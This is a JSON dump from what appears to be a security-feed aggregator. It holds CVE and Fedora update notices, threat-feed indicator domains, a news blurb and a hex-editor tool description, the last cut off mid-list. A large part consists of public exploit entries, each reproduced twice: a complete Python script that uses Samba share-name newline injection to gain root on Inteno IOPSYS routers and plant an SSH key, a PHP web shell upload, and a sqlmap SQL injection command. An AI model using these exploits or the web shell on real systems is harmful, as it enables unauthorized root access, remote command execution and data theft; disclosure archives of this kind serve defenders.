{"cve": [{"lastseen": "2021-01-19T12:37:56", "description": "** DISPUTED ** fs/nfsd/nfs3xdr.c in the Linux kernel through 5.10.8, when there is an NFS export of a subdirectory of a filesystem, allows remote attackers to traverse to other parts of the filesystem via READDIRPLUS. NOTE: some parties argue that such a subdirectory export is not intended to prevent this attack; see also the exports(5) no_subtree_check default behavior.", "edition": 1, "cvss3": {}, "published": "2021-01-19T07:15:00", "title": "CVE-2021-3178", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-3178"], "modified": "2021-01-19T07:15:00", "cpe": [], "id": "CVE-2021-3178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3178", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "fedora": [{"lastseen": "2021-01-19T06:33:09", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. ", "modified": "2021-01-19T01:52:27", "published": "2021-01-19T01:52:27", "id": "FEDORA:B6BE0309FF1D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: flatpak-1.8.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-18T04:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2019-25013"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2021-01-18T01:35:42", "published": "2021-01-18T01:35:42", "id": "FEDORA:F0266309ACD0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: glibc-2.32-3.fc33", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. ", "modified": "2021-01-16T01:35:15", "published": "2021-01-16T01:35:15", "id": "FEDORA:1BA3E30CF28F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: flatpak-1.10.0-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2021-01-16T01:35:11", "published": "2021-01-16T01:35:11", "id": "FEDORA:C6B8230CF2BC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: kernel-headers-5.10.7-200.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T02:59:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28374"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2021-01-16T01:24:20", "published": "2021-01-16T01:24:20", "id": "FEDORA:8068430CBD46", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: kernel-headers-5.10.7-100.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2021-01-18T19:07:18", "bulletinFamily": "blog", "cvelist": [], "description": "By [Sudais Asif](<https://www.hackread.com/author/sudais/>)\n\nAccording to their father, the kids were able to bypass the Linux Mint screensaver lock not once but twice.\n\nThis is a post from HackRead.com Read the original post: ['Child's Play' - Kids breach and bypass Linux Mint screensaver lock](<https://www.hackread.com/kids-breach-bypass-linux-mint-screensaver-lock/>)", "modified": "2021-01-18T18:35:40", "published": "2021-01-18T18:35:40", "id": "HACKREAD:A6EB028653B33477E63F8FD8A3A77E14", "href": "https://www.hackread.com/kids-breach-bypass-linux-mint-screensaver-lock/", "type": "hackread", "title": "\u2018Child\u2019s Play\u2019 \u2013 Kids breach and bypass Linux Mint screensaver lock", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Life Insurance Management System 1.0 - File Upload RCE (Authenticated)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49440", "href": "https://www.exploit-db.com/exploits/49440", "sourceData": "# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated)\r\n# Date: 15/1/2021\r\n# Exploit Author: Aitor Herrero\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html\r\n# Version: 1.0\r\n# Tested on: Windows /linux /\r\n\r\nLogin in the application\r\n\r\nGo to Clients and you can add new client o modify existent\r\n\r\nClick examination botton and upload a test.php with content:\r\n\r\n\"<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd =\r\n($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\"\r\n\r\nClick Upload and intercept with burpsuite\r\n\r\nChange the content type to image/png\r\n\r\nGo to the path\r\n\r\nhttp://localhost:8080/lims/uploads/test.php?cmd=dir", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49440"}, {"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49438", "href": "https://www.exploit-db.com/exploits/49438", "sourceData": "# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)\r\n# Date: 2020-03-29\r\n# Exploit Author: Henrik Pedersen\r\n# Vendor Homepage: https://intenogroup.com/\r\n# Version: Iopsys <3.16.5\r\n# Fixed Version: Iopsys 3.16.5\r\n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router\r\n\r\n# Description:\r\n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem.\r\n\r\n# Patch in release\r\n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt\r\n\r\n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/\r\n\r\n#!/usr/bin/python3\r\nimport json\r\nimport sys\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom websocket import create_connection\r\nfrom impacket.smbconnection import SMBConnection\r\nfrom impacket.examples.smbclient import MiniImpacketShell\r\n\r\n\"\"\"\r\nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5\r\n\r\nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>\r\n\r\nRequires:\r\nimpacket\r\nwebsocket-client\r\n\r\nOn Windows:\r\npyreadline\r\n\r\n\"\"\"\r\n\r\ndef ubusAuth(host, username, password):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\r\n \"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [\r\n \"00000000000000000000000000000000\",\"session\",\"login\",\r\n {\"username\": username,\"password\": password}\r\n ],\r\n \"id\": 666\r\n })\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n key = response.get('result')[1].get('ubus_rpc_session')\r\n except IndexError:\r\n return None\r\n return key\r\n\r\ndef ubusCall(host, key, namespace, argument, params={}):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [key,namespace,argument,params],\r\n \"id\": 666})\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n result = response.get('result')[1]\r\n except IndexError:\r\n if response.get('result')[0] == 0:\r\n return True\r\n return None\r\n return result\r\n\r\ndef auth(host, user, password):\r\n print(\"Authenticating...\")\r\n key = ubusAuth(host, user, password)\r\n if not key:\r\n print(\"[-] Auth failed!\")\r\n sys.exit(1)\r\n print(f\"[+] Auth successful\")\r\n return key\r\n\r\ndef smb_put(args):\r\n username = \"\"\r\n password = \"\"\r\n\r\n try:\r\n smbClient = SMBConnection(args.host, args.host, sess_port=445)\r\n smbClient.login(username, password, args.host)\r\n\r\n print(\"Reading SSH key\")\r\n try:\r\n with open(args.key_path, \"r\") as fd:\r\n sshkey = fd.read()\r\n except IOError:\r\n print(f\"[-] Error reading {args.sshkey}\")\r\n \r\n print(\"Creating temp file for authorized_keys\")\r\n try:\r\n with open(\"authorized_keys\", \"w\") as fd:\r\n fd.write(sshkey)\r\n path = os.path.realpath(fd.name)\r\n except IOError:\r\n print(\"[-] Error creating authorized_keys\")\r\n\r\n shell = MiniImpacketShell(smbClient)\r\n shell.onecmd(\"use pwned\")\r\n shell.onecmd(\"cd /etc/dropbear\")\r\n shell.onecmd(f\"put {fd.name}\") \r\n\r\n print(\"Cleaning up...\")\r\n os.remove(path)\r\n except Exception as e:\r\n print(\"[-] Error connecting to SMB share:\")\r\n print(str(e))\r\n sys.exit(1)\r\n\r\ndef main(args):\r\n payload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\"\r\n key = auth(args.host, args.user, args.passwd)\r\n print(\"Adding Samba share...\")\r\n smbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"}))\r\n if \"pwned\" in smbcheck:\r\n print(\"[*] Samba share seems to already exist, skipping\")\r\n else:\r\n smba = ubusCall(args.host, key, \"uci\", \"add\", {\r\n \"config\": \"samba\", \r\n \"type\":\"sambashare\", \r\n \"values\": {\r\n \"name\": payload, \r\n \"read_only\": \"no\", \r\n \"create_mask\":\"0775\", \r\n \"dir_mask\":\"0775\",\r\n \"path\": \"/mnt/\", \r\n \"guest_ok\": \"yes\"\r\n }\r\n })\r\n if not smba:\r\n print(\"[-] Adding Samba share failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Enabling Samba...\")\r\n smbe = ubusCall(args.host, key, \"uci\", \"set\",\r\n {\"config\":\"samba\", \"type\":\"samba\", \"values\":\r\n {\"interface\":\"lan\"}})\r\n if not smbe:\r\n print(\"[-] Enabling Samba failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Committing changes...\")\r\n smbc = ubusCall(args.host, key, \"uci\", \"commit\",\r\n {\"config\":\"samba\"})\r\n if not smbc:\r\n print(\"[-] Committing changes failed!\")\r\n sys.exit(1)\r\n \r\n if args.key_path:\r\n # Allow the service to start\r\n time.sleep(2)\r\n smb_put(args)\r\n print(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\")\r\n else:\r\n print(\"[+] Exploit complete, SMB share added.\")\r\n\r\ndef parse_args(args):\r\n \"\"\" Create the arguments \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\")\r\n parser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\")\r\n parser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\")\r\n parser.add_argument(dest=\"host\", help=\"Target host\")\r\n\r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return parser.parse_args(args)\r\n\r\nif __name__ == \"__main__\":\r\n main(parse_args(sys.argv[1:]))", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49438"}, {"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Life Insurance Management System 1.0 - 'client_id' SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49439", "href": "https://www.exploit-db.com/exploits/49439", "sourceData": "# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection\r\n# Date: 15/1/2021\r\n# Exploit Author: Aitor Herrero\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html\r\n# Version: 1.0\r\n# Tested on: Windows /linux /\r\n\r\nLogin in the application\r\n\r\nGo to clientStatus.php?client_id=\r\n\r\nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1\r\n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49439"}], "packetstorm": [{"lastseen": "2021-01-18T16:22:48", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160980", "href": "https://packetstormsecurity.com/files/160980/Life-Insurance-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to clientStatus.php?client_id= \n \nsqlmap -u \"http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 \n<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160980/lims10-sql.txt"}, {"lastseen": "2021-01-18T16:20:01", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Life Insurance Management System 1.0 Shell Upload", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160981", "href": "https://packetstormsecurity.com/files/160981/Life-Insurance-Management-System-1.0-Shell-Upload.html", "sourceData": "`# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated) \n# Date: 15/1/2021 \n# Exploit Author: Aitor Herrero \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html \n# Version: 1.0 \n# Tested on: Windows /linux / \n \nLogin in the application \n \nGo to Clients and you can add new client o modify existent \n \nClick examination botton and upload a test.php with content: \n \n\"<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = \n($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\" \n \nClick Upload and intercept with burpsuite \n \nChange the content type to image/png \n \nGo to the path \n \nhttp://localhost:8080/lims/uploads/test.php?cmd=dir \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160981/lims10-shell.txt"}, {"lastseen": "2021-01-18T16:23:55", "description": "", "published": "2021-01-18T00:00:00", "type": "packetstorm", "title": "Inteno IOPSYS 3.16.4 Root Filesystem Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "PACKETSTORM:160988", "href": "https://packetstormsecurity.com/files/160988/Inteno-IOPSYS-3.16.4-Root-Filesystem-Access.html", "sourceData": "`# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated) \n# Date: 2020-03-29 \n# Exploit Author: Henrik Pedersen \n# Vendor Homepage: https://intenogroup.com/ \n# Version: Iopsys <3.16.5 \n# Fixed Version: Iopsys 3.16.5 \n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router \n \n# Description: \n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem. \n \n# Patch in release \n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt \n \n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/ \n \n#!/usr/bin/python3 \nimport json \nimport sys \nimport os \nimport time \nimport argparse \nfrom websocket import create_connection \nfrom impacket.smbconnection import SMBConnection \nfrom impacket.examples.smbclient import MiniImpacketShell \n \n\"\"\" \nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5 \n \nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host> \n \nRequires: \nimpacket \nwebsocket-client \n \nOn Windows: \npyreadline \n \n\"\"\" \n \ndef ubusAuth(host, username, password): \n\"\"\" \nhttps://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py \n\"\"\" \nws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"]) \nreq = json.dumps({ \n\"jsonrpc\": \"2.0\", \"method\": \"call\", \n\"params\": [ \n\"00000000000000000000000000000000\",\"session\",\"login\", \n{\"username\": username,\"password\": password} \n], \n\"id\": 666 \n}) \nws.send(req) \nresponse = json.loads(ws.recv()) \nws.close() \ntry: \nkey = response.get('result')[1].get('ubus_rpc_session') \nexcept IndexError: \nreturn None \nreturn key \n \ndef ubusCall(host, key, namespace, argument, params={}): \n\"\"\" \nhttps://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py \n\"\"\" \nws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"]) \nreq = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\", \n\"params\": [key,namespace,argument,params], \n\"id\": 666}) \nws.send(req) \nresponse = json.loads(ws.recv()) \nws.close() \ntry: \nresult = response.get('result')[1] \nexcept IndexError: \nif response.get('result')[0] == 0: \nreturn True \nreturn None \nreturn result \n \ndef auth(host, user, password): \nprint(\"Authenticating...\") \nkey = ubusAuth(host, user, password) \nif not key: \nprint(\"[-] Auth failed!\") \nsys.exit(1) \nprint(f\"[+] Auth successful\") \nreturn key \n \ndef smb_put(args): \nusername = \"\" \npassword = \"\" \n \ntry: \nsmbClient = SMBConnection(args.host, args.host, sess_port=445) \nsmbClient.login(username, password, args.host) \n \nprint(\"Reading SSH key\") \ntry: \nwith open(args.key_path, \"r\") as fd: \nsshkey = fd.read() \nexcept IOError: \nprint(f\"[-] Error reading {args.sshkey}\") \n \nprint(\"Creating temp file for authorized_keys\") \ntry: \nwith open(\"authorized_keys\", \"w\") as fd: \nfd.write(sshkey) \npath = os.path.realpath(fd.name) \nexcept IOError: \nprint(\"[-] Error creating authorized_keys\") \n \nshell = MiniImpacketShell(smbClient) \nshell.onecmd(\"use pwned\") \nshell.onecmd(\"cd /etc/dropbear\") \nshell.onecmd(f\"put {fd.name}\") \n \nprint(\"Cleaning up...\") \nos.remove(path) \nexcept Exception as e: \nprint(\"[-] Error connecting to SMB share:\") \nprint(str(e)) \nsys.exit(1) \n \ndef main(args): \npayload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\" \nkey = auth(args.host, args.user, args.passwd) \nprint(\"Adding Samba share...\") \nsmbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"})) \nif \"pwned\" in smbcheck: \nprint(\"[*] Samba share seems to already exist, skipping\") \nelse: \nsmba = ubusCall(args.host, key, \"uci\", \"add\", { \n\"config\": \"samba\", \n\"type\":\"sambashare\", \n\"values\": { \n\"name\": payload, \n\"read_only\": \"no\", \n\"create_mask\":\"0775\", \n\"dir_mask\":\"0775\", \n\"path\": \"/mnt/\", \n\"guest_ok\": \"yes\" \n} \n}) \nif not smba: \nprint(\"[-] Adding Samba share failed!\") \nsys.exit(1) \n \nprint(\"Enabling Samba...\") \nsmbe = ubusCall(args.host, key, \"uci\", \"set\", \n{\"config\":\"samba\", \"type\":\"samba\", \"values\": \n{\"interface\":\"lan\"}}) \nif not smbe: \nprint(\"[-] Enabling Samba failed!\") \nsys.exit(1) \n \nprint(\"Committing changes...\") \nsmbc = ubusCall(args.host, key, \"uci\", \"commit\", \n{\"config\":\"samba\"}) \nif not smbc: \nprint(\"[-] Committing changes failed!\") \nsys.exit(1) \n \nif args.key_path: \n# Allow the service to start \ntime.sleep(2) \nsmb_put(args) \nprint(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\") \nelse: \nprint(\"[+] Exploit complete, SMB share added.\") \n \ndef parse_args(args): \n\"\"\" Create the arguments \"\"\" \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\") \nparser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\") \nparser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\") \nparser.add_argument(dest=\"host\", help=\"Target host\") \n \nif len(sys.argv) < 2: \nparser.print_help() \nsys.exit(1) \n \nreturn parser.parse_args(args) \n \nif __name__ == \"__main__\": \nmain(parse_args(sys.argv[1:])) \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160988/intenoiopsys3164-bypass.txt"}], "rst": [{"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **magos-linux[.]ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 185[.]199.108.153,185.199.110.153,185.199.109.153,185.199.111.153\nWhois:\n Created: 2009-05-07 20:00:00, \n Registrar: REGRURU, \n Registrant: Private Person.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:238A021A-0F7E-332E-A8A8-6B1297956476", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: magos-linux.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **jukykq[.]linux-dude.net** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 212[.]95.56.89\nWhois:\n Created: 2000-06-14 20:54:19, \n Registrar: unknown, \n Registrant: Registercom Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:8BBD390F-636E-3849-9F45-3F2A680011A2", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: jukykq.linux-dude.net", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **www[.]linux-repository-updates.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:0C9BB3E3-05CA-35A0-9DE9-FD6AD623CCC5", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: www.linux-repository-updates.com", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **home-linux[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-04-17T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-17T00:00:00", "id": "RST:ADF2B3D3-477C-3D00-B6B9-F1D23F62F994", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: home-linux.evolution-project.go.ro", "type": "rst", "cvss": {}}, {"lastseen": "2020-11-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **exec[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-11-06T03:00:00, Last seen: 2020-11-06T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-06T00:00:00", "id": "RST:F041A0BC-45FC-3B30-BD1E-AE96D121B4D1", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: exec.evolution-project.go.ro", "type": "rst", "cvss": {}}], "kitploit": [{"lastseen": "2021-01-17T23:34:58", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-nYPBTey058M/X_u5FUn683I/AAAAAAAAU-0/WhOudGKf_EY72V7zRGUsnkcjqXR6fR_fQCNcBGAsYHQ/s1920/ImHex_6.png>)\n\n \n\n\nA [ Hex Editor ](<https://www.kitploit.com/search/label/Hex%20Editor> \"Hex Editor\" ) for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM. \n\n \n** Features ** \n\n\n * Featureful hex view \n * Byte patching \n * Patch management \n * Copy bytes as feature \n * Bytes \n * Hex string \n * C, C++, C#, Rust, Python, Java & JavaScript array \n * ASCII-Art hex view \n * HTML self contained div \n * String and hex search \n * Colorful highlighting \n * Goto from start, end and current cursor position \n * Custom C++-like pattern language for parsing highlighting a file's content \n * Automatic loading based on MIME type \n * arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big endian support, conditionals and much more! \n * Useful error messages, syntax highlighting and error marking \n * Data importing \n * Base64 files \n * IPS and IPS32 patches \n * Data exporting \n * IPS and IPS32 patches \n * Data [ inspector ](<https://www.kitploit.com/search/label/Inspector> \"inspector\" ) allowing interpretation of data as many different types (little and big endian) \n * Huge file support with fast and efficient loading \n * String search \n * Copying of strings \n * Copying of demangled strings \n * File [ hashing ](<https://www.kitploit.com/search/label/Hashing> \"hashing\" ) support \n * CRC16 and CRC32 with custom initial values and polynomials \n * MD4, MD5 \n * SHA-1, SHA-224, SHA-256, SHA-384, SHA-512 \n * Disassembler supporting many different architectures \n * ARM32 (ARM, Thumb, Cortex-M, AArch32) \n * ARM64 \n * MIPS (MIPS32, MIPS64, MIPS32R6, Micro) \n * x86 (16-bit, 32-bit, 64-bit) \n * PowerPC (32-bit, 64-bit) \n * SPARC \n * IBM SystemZ \n * xCORE \n * M68K \n * TMS320C64X \n * M680X \n * Ethereum \n * Bookmarks \n * Region highlighting \n * Comments \n * Data Analyzer \n * File magic-based file parser and MIME type database \n * Byte distribution graph \n * Entropy graph \n * Highest and avarage entropy \n * Encrypted / Compressed file detection \n * Helpful tools \n * Itanium and MSVC demangler \n * ASCII table \n * Regex replacer \n * Mathematical expression evaluator (Calculator) \n * Hexadecimal Color picker \n * Built-in cheat sheet for pattern language and Math evaluator \n * Doesn't burn out your retinas when used in late-night sessions \n\n \n\n\n** Screenshots ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-P0hYfOcXru8/X_u5NgOCLNI/AAAAAAAAU-4/ie1tXx-JB14aYV0vldtdYlbeQ9NQZaRGQCNcBGAsYHQ/s1920/ImHex_6.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-iYPBXtI95pQ/X_u5NoqHjdI/AAAAAAAAU-8/eKmTABFICVIyaLsZYHFeYnOajgIPaRG-wCNcBGAsYHQ/s1920/ImHex_7.png>)\n\n \n\n\n** Pattern Language ** \n\n\nThe custom C-like Pattern Language developed and used by ImHex is easy to read, understand and learn. A guide with all features of the langauge can be found [ in the wiki ](<https://github.com/WerWolv/ImHex/wiki/Pattern-Language-Guide> \"in the wiki\" ) or a simpler version in ImHex under ` Help -> Pattern Language Cheat Sheet `\n\n \n** Additional Files ** \n\n\nFor format patterns, includable libraries and magic files, check out the [ ImHex-Patterns ](<https://github.com/WerWolv/ImHex-Patterns> \"ImHex-Patterns\" ) repository. Feel free to PR your own files there as well! \n\n \n** Nightly builds ** \n\n\nSee latest nightly builds on the artifacts result of the Build action [ here ](<https://github.com/WerWolv/ImHex/actions?query=workflow%3ABuild> \"here\" ) . \n\nNOTE: ** We currently only provide nightly builds for macOS (x86_64) **\n\n \n** Compiling ** \n\n\nYou need a C++20 compatible [ compiler ](<https://www.kitploit.com/search/label/Compiler> \"compiler\" ) such as GCC 10.2.0 to compile ImHex. Moreover, the following dependencies are needed for compiling ImHex: \n\n * GLFW3 